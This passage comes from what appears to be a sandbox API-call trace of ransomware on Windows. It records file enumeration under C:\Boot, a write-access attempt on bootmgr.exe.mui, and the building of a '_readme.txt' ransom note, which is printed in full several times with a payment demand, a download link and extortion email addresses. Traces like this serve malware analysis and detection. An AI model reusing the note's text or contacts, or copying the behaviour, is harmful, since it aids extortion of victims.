returned 0x3b3c660 [0166.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.046] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0166.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.046] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0166.046] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.046] PathFindFileNameW (pszPath="") returned="" [0166.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.046] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0166.046] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0166.046] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0166.047] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0166.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19ec8 [0166.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.047] FreeLibrary (hLibModule=0x759d0000) returned 1 [0166.047] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0166.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.047] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0166.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0166.047] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0166.047] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0166.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0166.047] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.048] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.048] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.048] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0166.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f60 [0166.048] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned=".mui" [0166.048] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.048] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0166.048] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0166.048] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0166.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0166.049] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0166.049] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.049] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.049] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.050] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.050] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.051] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.052] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: 